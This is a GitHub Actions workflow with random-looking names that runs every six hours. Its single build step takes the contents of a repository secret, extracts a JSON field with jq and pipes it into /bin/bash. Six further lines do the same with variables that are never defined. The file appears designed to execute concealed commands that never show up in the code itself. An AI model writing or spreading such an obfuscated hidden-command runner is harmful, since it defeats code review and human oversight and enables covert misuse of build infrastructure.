name: huakkc

on:
  workflow_dispatch:
  schedule:
    - cron: '36 0/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: huakkc
        env:
          mc71: ${{ secrets.mc71 }}
        run: |
          echo $mc71 | jq -r .zlelr413 | /bin/bash
          echo $fgsz8 | jq -r .jocp89 | /bin/bash
          echo $hccuf699 | jq -r .luu402 | /bin/bash
          echo $cbuws8 | jq -r .ld5 | /bin/bash
          echo $zv1 | jq -r .k49450 | /bin/bash
          echo $lo31807 | jq -r .omov4 | /bin/bash
          echo $zjf04675 | jq -r .uin2 | /bin/bash

